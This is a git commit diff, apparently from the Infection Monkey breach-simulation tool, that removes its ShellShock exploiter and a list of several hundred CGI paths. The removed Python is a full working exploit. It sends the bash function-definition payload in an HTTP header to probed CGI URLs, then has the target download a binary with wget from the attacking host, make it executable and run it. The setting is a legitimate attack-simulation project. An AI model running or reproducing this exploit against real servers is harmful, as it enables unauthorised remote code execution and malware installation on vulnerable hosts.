Agent: Remove ShellShock exploiter

This commit is contained in:
Ilija Lazoroski 2022-02-23 13:26:25 +01:00
parent 1e12a55240
commit 64b900b94d
3 changed files with 0 additions and 678 deletions

View File

@ -27,7 +27,6 @@
"SSHExploiter", "SSHExploiter",
"SmbExploiter", "SmbExploiter",
"WmiExploiter", "WmiExploiter",
"ShellShockExploiter",
"ElasticGroovyExploiter", "ElasticGroovyExploiter",
"Struts2Exploiter", "Struts2Exploiter",
"WebLogicExploiter", "WebLogicExploiter",

View File

@ -1,269 +0,0 @@
# Implementation is based on shellshock script provided
# https://github.com/nccgroup/shocker/blob/master/shocker.py
import logging
import string
from random import SystemRandom
import requests
from common.utils.attack_utils import ScanStatus
from infection_monkey.exploit.HostExploiter import HostExploiter
from infection_monkey.exploit.shellshock_resources import CGI_FILES
from infection_monkey.exploit.tools.helpers import get_monkey_depth, get_target_monkey
from infection_monkey.exploit.tools.http_tools import HTTPTools
from infection_monkey.model import DROPPER_ARG
from infection_monkey.telemetry.attack.t1222_telem import T1222Telem
from infection_monkey.utils.commands import build_monkey_commandline
logger = logging.getLogger(__name__)
TIMEOUT = 2
TEST_COMMAND = "/bin/uname -a"
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
LOCK_HELPER_FILE = "/tmp/monkey_shellshock"
class ShellShockExploiter(HostExploiter):
_attacks = {"Content-type": "() { :;}; echo; "}
_TARGET_OS_TYPE = ["linux"]
_EXPLOITED_SERVICE = "Bash"
def __init__(self, host):
super(ShellShockExploiter, self).__init__(host)
self.HTTP = [str(port) for port in self._config.HTTP_PORTS]
safe_random = SystemRandom()
self.success_flag = "".join(
safe_random.choice(string.ascii_uppercase + string.digits) for _ in range(20)
)
def _exploit_host(self):
# start by picking ports
candidate_services = {
service: self.host.services[service]
for service in self.host.services
if ("name" in self.host.services[service])
and (self.host.services[service]["name"] == "http")
}
valid_ports = [
(port, candidate_services["tcp-" + str(port)]["data"][1])
for port in self.HTTP
if "tcp-" + str(port) in candidate_services
]
http_ports = [port[0] for port in valid_ports if not port[1]]
https_ports = [port[0] for port in valid_ports if port[1]]
logger.info(
"Scanning %s, ports [%s] for vulnerable CGI pages"
% (self.host, ",".join([str(port[0]) for port in valid_ports]))
)
attackable_urls = []
# now for each port we want to check the entire URL list
for port in http_ports:
urls = self.check_urls(self.host.ip_addr, port)
attackable_urls.extend(urls)
for port in https_ports:
urls = self.check_urls(self.host.ip_addr, port, is_https=True)
attackable_urls.extend(urls)
# now for each URl we want to try and see if it's attackable
exploitable_urls = [self.attempt_exploit(url) for url in attackable_urls]
exploitable_urls = [url for url in exploitable_urls if url[0] is True]
# we want to report all vulnerable URLs even if we didn't succeed
self.exploit_info["vulnerable_urls"] = [url[1] for url in exploitable_urls]
# now try URLs until we install something on victim
for _, url, header, exploit in exploitable_urls:
logger.info("Trying to attack host %s with %s URL" % (self.host, url))
# same attack script as sshexec
# for any failure, quit and don't try other URLs
if not self.host.os.get("type"):
try:
uname_os_attack = exploit + "/bin/uname -o"
uname_os = self.attack_page(url, header, uname_os_attack)
if "linux" in uname_os:
self.host.os["type"] = "linux"
else:
logger.info("SSH Skipping unknown os: %s", uname_os)
return False
except Exception as exc:
logger.debug(
"Error running uname os command on victim %r: (%s)", self.host, exc
)
return False
if not self.host.os.get("machine"):
try:
uname_machine_attack = exploit + "/bin/uname -m"
uname_machine = self.attack_page(url, header, uname_machine_attack)
if "" != uname_machine:
self.host.os["machine"] = uname_machine.lower().strip()
except Exception as exc:
logger.debug(
"Error running uname machine command on victim %r: (%s)", self.host, exc
)
return False
# copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux
src_path = get_target_monkey(self.host)
if not src_path:
logger.info("Can't find suitable monkey executable for host %r", self.host)
return False
if not self._create_lock_file(exploit, url, header):
logger.info("Another monkey is running shellshock exploit")
return True
http_path, http_thread = HTTPTools.create_transfer(self.host, src_path)
if not http_path:
logger.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False
download_command = "/usr/bin/wget %s -O %s;" % (http_path, dropper_target_path_linux)
download = exploit + download_command
self.attack_page(
url, header, download
) # we ignore failures here since it might take more than TIMEOUT time
http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop()
self._remove_lock_file(exploit, url, header)
if (http_thread.downloads != 1) or (
"ELF"
not in self.check_remote_file_exists(
url, header, exploit, dropper_target_path_linux
)
):
logger.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue
# turn the monkey into an executable
chmod = "/bin/chmod +x %s" % dropper_target_path_linux
run_path = exploit + chmod
self.attack_page(url, header, run_path)
T1222Telem(ScanStatus.USED, chmod, self.host).send()
# run the monkey
cmdline = "%s %s" % (dropper_target_path_linux, DROPPER_ARG)
cmdline += build_monkey_commandline(
self.host,
get_monkey_depth() - 1,
dropper_target_path_linux,
)
cmdline += " & "
run_path = exploit + cmdline
self.attack_page(url, header, run_path)
logger.info(
"Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux,
self.host,
cmdline,
)
if not (
self.check_remote_file_exists(
url, header, exploit, self._config.monkey_log_path_linux
)
):
logger.info("Log file does not exist, monkey might not have run")
continue
self.add_executed_cmd(cmdline)
return True
return False
@classmethod
def check_remote_file_exists(cls, url, header, exploit, file_path):
"""
Checks if a remote file exists and returns the content if so
file_path should be fully qualified
"""
cmdline = "/usr/bin/head -c 4 %s" % file_path
run_path = exploit + cmdline
resp = cls.attack_page(url, header, run_path)
if resp:
logger.info("File %s exists on remote host" % file_path)
return resp
def attempt_exploit(self, url, attacks=None):
# Flag used to identify whether the exploit has successfully caused the
# server to return a useful response
if not attacks:
attacks = self._attacks
logger.debug("Attack Flag is: %s" % self.success_flag)
logger.debug("Trying exploit for %s" % url)
for header, exploit in list(attacks.items()):
attack = exploit + " echo " + self.success_flag + "; " + TEST_COMMAND
result = self.attack_page(url, header, attack)
if self.success_flag in result:
logger.info("URL %s looks vulnerable" % url)
return True, url, header, exploit
else:
logger.debug("URL %s does not seem to be vulnerable with %s header" % (url, header))
return (False,)
def _create_lock_file(self, exploit, url, header):
if self.check_remote_file_exists(url, header, exploit, LOCK_HELPER_FILE):
return False
cmd = exploit + "echo AAAA > %s" % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
return True
def _remove_lock_file(self, exploit, url, header):
cmd = exploit + "rm %s" % LOCK_HELPER_FILE
self.attack_page(url, header, cmd)
@staticmethod
def attack_page(url, header, attack):
result = ""
try:
logger.debug("Header is: %s" % header)
logger.debug("Attack is: %s" % attack)
r = requests.get( # noqa: DUO123
url, headers={header: attack}, verify=False, timeout=TIMEOUT
)
result = r.content.decode()
return result
except requests.exceptions.RequestException as exc:
logger.debug("Failed to run, exception %s" % exc)
return result
@staticmethod
def check_urls(host, port, is_https=False, url_list=CGI_FILES):
"""
Checks if which urls exist
:return: Sequence of URLs to try and attack
"""
attack_path = "http://"
if is_https:
attack_path = "https://"
attack_path = attack_path + str(host) + ":" + str(port)
reqs = []
timeout = False
attack_urls = [attack_path + url for url in url_list]
for u in attack_urls:
try:
reqs.append(requests.head(u, verify=False, timeout=TIMEOUT)) # noqa: DUO123
except requests.Timeout:
timeout = True
break
if timeout:
logger.debug(
"Some connections timed out while sending request to potentially vulnerable "
"urls."
)
valid_resps = [req for req in reqs if req and req.status_code == requests.codes.ok]
urls = [resp.url for resp in valid_resps]
return urls

View File

@ -1,408 +0,0 @@
# resource for shellshock attack
# copied and transformed from https://github.com/nccgroup/shocker/blob/master/shocker-cgi_list
CGI_FILES = (
r"/",
r"/admin.cgi",
r"/administrator.cgi",
r"/agora.cgi",
r"/aktivate/cgi-bin/catgy.cgi",
r"/analyse.cgi",
r"/apps/web/vs_diag.cgi",
r"/axis-cgi/buffer/command.cgi",
r"/b2-include/b2edit.showposts.php",
r"/bandwidth/index.cgi",
r"/bigconf.cgi",
r"/cartcart.cgi",
r"/cart.cgi",
r"/ccbill/whereami.cgi",
r"/cgi-bin/14all-1.1.cgi",
r"/cgi-bin/14all.cgi",
r"/cgi-bin/a1disp3.cgi",
r"/cgi-bin/a1stats/a1disp3.cgi",
r"/cgi-bin/a1stats/a1disp4.cgi",
r"/cgi-bin/addbanner.cgi",
r"/cgi-bin/add_ftp.cgi",
r"/cgi-bin/adduser.cgi",
r"/cgi-bin/admin/admin.cgi",
r"/cgi-bin/admin.cgi",
r"/cgi-bin/admin/getparam.cgi",
r"/cgi-bin/adminhot.cgi",
r"/cgi-bin/admin.pl",
r"/cgi-bin/admin/setup.cgi",
r"/cgi-bin/adminwww.cgi",
r"/cgi-bin/af.cgi",
r"/cgi-bin/aglimpse.cgi",
r"/cgi-bin/alienform.cgi",
r"/cgi-bin/AnyBoard.cgi",
r"/cgi-bin/architext_query.cgi",
r"/cgi-bin/astrocam.cgi",
r"/cgi-bin/AT-admin.cgi",
r"/cgi-bin/AT-generate.cgi",
r"/cgi-bin/auction/auction.cgi",
r"/cgi-bin/auktion.cgi",
r"/cgi-bin/ax-admin.cgi",
r"/cgi-bin/ax.cgi",
r"/cgi-bin/axs.cgi",
r"/cgi-bin/badmin.cgi",
r"/cgi-bin/banner.cgi",
r"/cgi-bin/bannereditor.cgi",
r"/cgi-bin/bb-ack.sh",
r"/cgi-bin/bb-histlog.sh",
r"/cgi-bin/bb-hist.sh",
r"/cgi-bin/bb-hostsvc.sh",
r"/cgi-bin/bb-replog.sh",
r"/cgi-bin/bb-rep.sh",
r"/cgi-bin/bbs_forum.cgi",
r"/cgi-bin/bigconf.cgi",
r"/cgi-bin/bizdb1-search.cgi",
r"/cgi-bin/blog/mt-check.cgi",
r"/cgi-bin/blog/mt-load.cgi",
r"/cgi-bin/bnbform.cgi",
r"/cgi-bin/book.cgi",
r"/cgi-bin/boozt/admin/index.cgi",
r"/cgi-bin/bsguest.cgi",
r"/cgi-bin/bslist.cgi",
r"/cgi-bin/build.cgi",
r"/cgi-bin/bulk/bulk.cgi",
r"/cgi-bin/cached_feed.cgi",
r"/cgi-bin/cachemgr.cgi",
r"/cgi-bin/calendar/index.cgi",
r"/cgi-bin/cartmanager.cgi",
r"/cgi-bin/cbmc/forums.cgi",
r"/cgi-bin/ccvsblame.cgi",
r"/cgi-bin/c_download.cgi",
r"/cgi-bin/cgforum.cgi",
r"/cgi-bin/.cgi",
r"/cgi-bin/cgi_process",
r"/cgi-bin/classified.cgi",
r"/cgi-bin/classifieds.cgi",
r"/cgi-bin/classifieds/classifieds.cgi",
r"/cgi-bin/classifieds/index.cgi",
r"/cgi-bin/.cobalt/alert/service.cgi",
r"/cgi-bin/.cobalt/message/message.cgi",
r"/cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi",
r"/cgi-bin/commandit.cgi",
r"/cgi-bin/commerce.cgi",
r"/cgi-bin/common/listrec.pl",
r"/cgi-bin/compatible.cgi",
r"/cgi-bin/Count.cgi",
r"/cgi-bin/csChatRBox.cgi",
r"/cgi-bin/csGuestBook.cgi",
r"/cgi-bin/csLiveSupport.cgi",
r"/cgi-bin/CSMailto.cgi",
r"/cgi-bin/CSMailto/CSMailto.cgi",
r"/cgi-bin/csNews.cgi",
r"/cgi-bin/csNewsPro.cgi",
r"/cgi-bin/csPassword.cgi",
r"/cgi-bin/csPassword/csPassword.cgi",
r"/cgi-bin/csSearch.cgi",
r"/cgi-bin/csv_db.cgi",
r"/cgi-bin/cvsblame.cgi",
r"/cgi-bin/cvslog.cgi",
r"/cgi-bin/cvsquery.cgi",
r"/cgi-bin/cvsqueryform.cgi",
r"/cgi-bin/day5datacopier.cgi",
r"/cgi-bin/day5datanotifier.cgi",
r"/cgi-bin/db_manager.cgi",
r"/cgi-bin/dbman/db.cgi",
r"/cgi-bin/dcforum.cgi",
r"/cgi-bin/dcshop.cgi",
r"/cgi-bin/dfire.cgi",
r"/cgi-bin/diagnose.cgi",
r"/cgi-bin/dig.cgi",
r"/cgi-bin/directorypro.cgi",
r"/cgi-bin/download.cgi",
r"/cgi-bin/e87_Ba79yo87.cgi",
r"/cgi-bin/emu/html/emumail.cgi",
r"/cgi-bin/emumail.cgi",
r"/cgi-bin/emumail/emumail.cgi",
r"/cgi-bin/enter.cgi",
r"/cgi-bin/environ.cgi",
r"/cgi-bin/ezadmin.cgi",
r"/cgi-bin/ezboard.cgi",
r"/cgi-bin/ezman.cgi",
r"/cgi-bin/ezshopper2/loadpage.cgi",
r"/cgi-bin/ezshopper3/loadpage.cgi",
r"/cgi-bin/ezshopper/loadpage.cgi",
r"/cgi-bin/ezshopper/search.cgi",
r"/cgi-bin/faqmanager.cgi",
r"/cgi-bin/FileSeek2.cgi",
r"/cgi-bin/FileSeek.cgi",
r"/cgi-bin/finger.cgi",
r"/cgi-bin/flexform.cgi",
r"/cgi-bin/fom.cgi",
r"/cgi-bin/fom/fom.cgi",
r"/cgi-bin/FormHandler.cgi",
r"/cgi-bin/FormMail.cgi",
r"/cgi-bin/gbadmin.cgi",
r"/cgi-bin/gbook/gbook.cgi",
r"/cgi-bin/generate.cgi",
r"/cgi-bin/getdoc.cgi",
r"/cgi-bin/gH.cgi",
r"/cgi-bin/gm-authors.cgi",
r"/cgi-bin/gm.cgi",
r"/cgi-bin/gm-cplog.cgi",
r"/cgi-bin/guestbook.cgi",
r"/cgi-bin/handler",
r"/cgi-bin/handler.cgi",
r"/cgi-bin/handler/netsonar",
r"/cgi-bin/hitview.cgi",
r"/cgi-bin/hsx.cgi",
r"/cgi-bin/html2chtml.cgi",
r"/cgi-bin/html2wml.cgi",
r"/cgi-bin/htsearch.cgi",
r"/cgi-bin/hw.sh", # testing
r"/cgi-bin/icat",
r"/cgi-bin/if/admin/nph-build.cgi",
r"/cgi-bin/ikonboard/help.cgi",
r"/cgi-bin/ImageFolio/admin/admin.cgi",
r"/cgi-bin/imageFolio.cgi",
r"/cgi-bin/index.cgi",
r"/cgi-bin/infosrch.cgi",
r"/cgi-bin/jammail.pl",
r"/cgi-bin/journal.cgi",
r"/cgi-bin/lastlines.cgi",
r"/cgi-bin/loadpage.cgi",
r"/cgi-bin/login.cgi",
r"/cgi-bin/logit.cgi",
r"/cgi-bin/log-reader.cgi",
r"/cgi-bin/lookwho.cgi",
r"/cgi-bin/lwgate.cgi",
r"/cgi-bin/MachineInfo",
r"/cgi-bin/MachineInfo",
r"/cgi-bin/magiccard.cgi",
r"/cgi-bin/mail/emumail.cgi",
r"/cgi-bin/maillist.cgi",
r"/cgi-bin/mailnews.cgi",
r"/cgi-bin/mail/nph-mr.cgi",
r"/cgi-bin/main.cgi",
r"/cgi-bin/main_menu.pl",
r"/cgi-bin/man.sh",
r"/cgi-bin/mini_logger.cgi",
r"/cgi-bin/mmstdod.cgi",
r"/cgi-bin/moin.cgi",
r"/cgi-bin/mojo/mojo.cgi",
r"/cgi-bin/mrtg.cgi",
r"/cgi-bin/mt.cgi",
r"/cgi-bin/mt/mt.cgi",
r"/cgi-bin/mt/mt-check.cgi",
r"/cgi-bin/mt/mt-load.cgi",
r"/cgi-bin/mt-static/mt-check.cgi",
r"/cgi-bin/mt-static/mt-load.cgi",
r"/cgi-bin/musicqueue.cgi",
r"/cgi-bin/myguestbook.cgi",
r"/cgi-bin/.namazu.cgi",
r"/cgi-bin/nbmember.cgi",
r"/cgi-bin/netauth.cgi",
r"/cgi-bin/netpad.cgi",
r"/cgi-bin/newsdesk.cgi",
r"/cgi-bin/nlog-smb.cgi",
r"/cgi-bin/nph-emumail.cgi",
r"/cgi-bin/nph-exploitscanget.cgi",
r"/cgi-bin/nph-publish.cgi",
r"/cgi-bin/nph-test.cgi",
r"/cgi-bin/pagelog.cgi",
r"/cgi-bin/pbcgi.cgi",
r"/cgi-bin/perlshop.cgi",
r"/cgi-bin/pfdispaly.cgi",
r"/cgi-bin/pfdisplay.cgi",
r"/cgi-bin/phf.cgi",
r"/cgi-bin/photo/manage.cgi",
r"/cgi-bin/photo/protected/manage.cgi",
r"/cgi-bin/php-cgi",
r"/cgi-bin/php.cgi",
r"/cgi-bin/php.fcgi",
r"/cgi-bin/ping.sh",
r"/cgi-bin/pollit/Poll_It_SSI_v2.0.cgi",
r"/cgi-bin/pollssi.cgi",
r"/cgi-bin/postcards.cgi",
r"/cgi-bin/powerup/r.cgi",
r"/cgi-bin/printenv",
r"/cgi-bin/probecontrol.cgi",
r"/cgi-bin/profile.cgi",
r"/cgi-bin/publisher/search.cgi",
r"/cgi-bin/quickstore.cgi",
r"/cgi-bin/quizme.cgi",
r"/cgi-bin/ratlog.cgi",
r"/cgi-bin/r.cgi",
r"/cgi-bin/register.cgi",
r"/cgi-bin/replicator/webpage.cgi/",
r"/cgi-bin/responder.cgi",
r"/cgi-bin/robadmin.cgi",
r"/cgi-bin/robpoll.cgi",
r"/cgi-bin/rtpd.cgi",
r"/cgi-bin/sbcgi/sitebuilder.cgi",
r"/cgi-bin/scoadminreg.cgi",
r"/cgi-bin-sdb/printenv",
r"/cgi-bin/sdbsearch.cgi",
r"/cgi-bin/search",
r"/cgi-bin/search.cgi",
r"/cgi-bin/search/search.cgi",
r"/cgi-bin/sendform.cgi",
r"/cgi-bin/shop.cgi",
r"/cgi-bin/shopper.cgi",
r"/cgi-bin/shopplus.cgi",
r"/cgi-bin/showcheckins.cgi",
r"/cgi-bin/simplestguest.cgi",
r"/cgi-bin/simplestmail.cgi",
r"/cgi-bin/smartsearch.cgi",
r"/cgi-bin/smartsearch/smartsearch.cgi",
r"/cgi-bin/snorkerz.bat",
r"/cgi-bin/snorkerz.bat",
r"/cgi-bin/snorkerz.cmd",
r"/cgi-bin/snorkerz.cmd",
r"/cgi-bin/sojourn.cgi",
r"/cgi-bin/spin_client.cgi",
r"/cgi-bin/start.cgi",
r"/cgi-bin/status",
r"/cgi-bin/status_cgi",
r"/cgi-bin/store/agora.cgi",
r"/cgi-bin/store.cgi",
r"/cgi-bin/store/index.cgi",
r"/cgi-bin/survey.cgi",
r"/cgi-bin/sync.cgi",
r"/cgi-bin/talkback.cgi",
r"/cgi-bin/technote/main.cgi",
r"/cgi-bin/test2.pl",
r"/cgi-bin/test-cgi",
r"/cgi-bin/test.cgi",
r"/cgi-bin/testing_whatever",
r"/cgi-bin/test/test.cgi",
r"/cgi-bin/tidfinder.cgi",
r"/cgi-bin/tigvote.cgi",
r"/cgi-bin/title.cgi",
r"/cgi-bin/top.cgi",
r"/cgi-bin/traffic.cgi",
r"/cgi-bin/troops.cgi",
r"/cgi-bin/ttawebtop.cgi/",
r"/cgi-bin/ultraboard.cgi",
r"/cgi-bin/upload.cgi",
r"/cgi-bin/urlcount.cgi",
r"/cgi-bin/viewcvs.cgi",
r"/cgi-bin/view_help.cgi",
r"/cgi-bin/viralator.cgi",
r"/cgi-bin/virgil.cgi",
r"/cgi-bin/vote.cgi",
r"/cgi-bin/vpasswd.cgi",
r"/cgi-bin/way-board.cgi",
r"/cgi-bin/way-board/way-board.cgi",
r"/cgi-bin/webbbs.cgi",
r"/cgi-bin/webcart/webcart.cgi",
r"/cgi-bin/webdist.cgi",
r"/cgi-bin/webif.cgi",
r"/cgi-bin/webmail/html/emumail.cgi",
r"/cgi-bin/webmap.cgi",
r"/cgi-bin/webspirs.cgi",
r"/cgi-bin/Web_Store/web_store.cgi",
r"/cgi-bin/whois.cgi",
r"/cgi-bin/whois_raw.cgi",
r"/cgi-bin/whois/whois.cgi",
r"/cgi-bin/wrap",
r"/cgi-bin/wrap.cgi",
r"/cgi-bin/wwwboard.cgi.cgi",
r"/cgi-bin/YaBB/YaBB.cgi",
r"/cgi-bin/zml.cgi",
r"/cgi-mod/index.cgi",
r"/cgis/wwwboard/wwwboard.cgi",
r"/cgi-sys/addalink.cgi",
r"/cgi-sys/defaultwebpage.cgi",
r"/cgi-sys/domainredirect.cgi",
r"/cgi-sys/entropybanner.cgi",
r"/cgi-sys/entropysearch.cgi",
r"/cgi-sys/FormMail-clone.cgi",
r"/cgi-sys/helpdesk.cgi",
r"/cgi-sys/mchat.cgi",
r"/cgi-sys/randhtml.cgi",
r"/cgi-sys/realhelpdesk.cgi",
r"/cgi-sys/realsignup.cgi",
r"/cgi-sys/signup.cgi",
r"/connector.cgi",
r"/cp/rac/nsManager.cgi",
r"/create_release.sh",
r"/CSNews.cgi",
r"/csPassword.cgi",
r"/dcadmin.cgi",
r"/dcboard.cgi",
r"/dcforum.cgi",
r"/dcforum/dcforum.cgi",
r"/debuff.cgi",
r"/debug.cgi",
r"/details.cgi",
r"/edittag/edittag.cgi",
r"/emumail.cgi",
r"/enter_buff.cgi",
r"/enter_bug.cgi",
r"/ez2000/ezadmin.cgi",
r"/ez2000/ezboard.cgi",
r"/ez2000/ezman.cgi",
r"/fcgi-bin/echo",
r"/fcgi-bin/echo",
r"/fcgi-bin/echo2",
r"/fcgi-bin/echo2",
r"/Gozila.cgi",
r"/hitmatic/analyse.cgi",
r"/hp_docs/cgi-bin/index.cgi",
r"/html/cgi-bin/cgicso",
r"/html/cgi-bin/cgicso",
r"/index.cgi",
r"/info.cgi",
r"/infosrch.cgi",
r"/login.cgi",
r"/mailview.cgi",
r"/main.cgi",
r"/megabook/admin.cgi",
r"/ministats/admin.cgi",
r"/mods/apage/apage.cgi",
r"/_mt/mt.cgi",
r"/musicqueue.cgi",
r"/ncbook.cgi",
r"/newpro.cgi",
r"/newsletter.sh",
r"/oem_webstage/cgi-bin/oemapp_cgi",
r"/page.cgi",
r"/parse_xml.cgi",
r"/photodata/manage.cgi",
r"/photo/manage.cgi",
r"/print.cgi",
r"/process_buff.cgi",
r"/process_bug.cgi",
r"/pub/english.cgi",
r"/quikmail/nph-emumail.cgi",
r"/quikstore.cgi",
r"/reviews/newpro.cgi",
r"/ROADS/cgi-bin/search.pl",
r"/sample01.cgi",
r"/sample02.cgi",
r"/sample03.cgi",
r"/sample04.cgi",
r"/sampleposteddata.cgi",
r"/scancfg.cgi",
r"/scancfg.cgi",
r"/servers/link.cgi",
r"/setpasswd.cgi",
r"/SetSecurity.shm",
r"/shop/member_html.cgi",
r"/shop/normal_html.cgi",
r"/site_searcher.cgi",
r"/siteUserMod.cgi",
r"/submit.cgi",
r"/technote/print.cgi",
r"/template.cgi",
r"/test.cgi",
r"/ucsm/isSamInstalled.cgi",
r"/upload.cgi",
r"/userreg.cgi",
r"/users/scripts/submit.cgi",
r"/vood/cgi-bin/vood_view.cgi",
r"/Web_Store/web_store.cgi",
r"/webtools/bonsai/ccvsblame.cgi",
r"/webtools/bonsai/cvsblame.cgi",
r"/webtools/bonsai/cvslog.cgi",
r"/webtools/bonsai/cvsquery.cgi",
r"/webtools/bonsai/cvsqueryform.cgi",
r"/webtools/bonsai/showcheckins.cgi",
r"/wwwadmin.cgi",
r"/wwwboard.cgi",
r"/wwwboard/wwwboard.cgi",
)